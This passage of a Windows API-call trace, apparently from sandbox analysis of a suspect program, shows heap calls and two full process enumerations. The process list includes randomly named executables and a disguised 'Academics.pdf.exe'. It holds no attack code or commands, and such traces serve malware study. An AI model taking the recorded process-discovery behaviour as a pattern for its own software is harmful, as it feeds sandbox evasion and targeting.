(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0280.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0280.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0280.783] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0280.785] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.786] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0280.787] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0280.788] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.789] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0280.790] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.791] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0280.791] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0280.792] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0280.792] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0280.793] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.794] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.794] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.795] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.796] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.797] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0280.798] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.798] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.799] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0280.800] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0280.807] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0280.808] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0280.809] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.810] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0280.811] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0280.811] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0280.812] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0280.813] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0280.814] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0280.815] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0280.816] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0280.816] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0280.817] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0280.818] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0280.819] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0280.820] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0280.820] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0280.821] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0280.822] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0280.823] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0280.823] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0280.824] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0280.825] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0280.826] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.826] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0280.827] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.828] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0280.829] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0280.830] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0280.830] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0280.831] CloseHandle (hObject=0x294) returned 1 [0280.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0280.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0280.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0280.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0280.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0280.831] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0280.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0280.831] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0280.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0280.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0280.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0280.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0280.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0280.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0280.832] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0280.834] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.834] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0280.835] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0280.836] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.837] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0280.838] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.839] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0280.839] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0280.840] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0280.840] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0280.841] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.842] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.842] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.843] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.844] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.844] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0280.845] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.846] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.846] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0280.847] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0280.850] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0280.851] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0280.852] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.853] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0280.853] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0280.854] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0280.855] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0280.856] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: 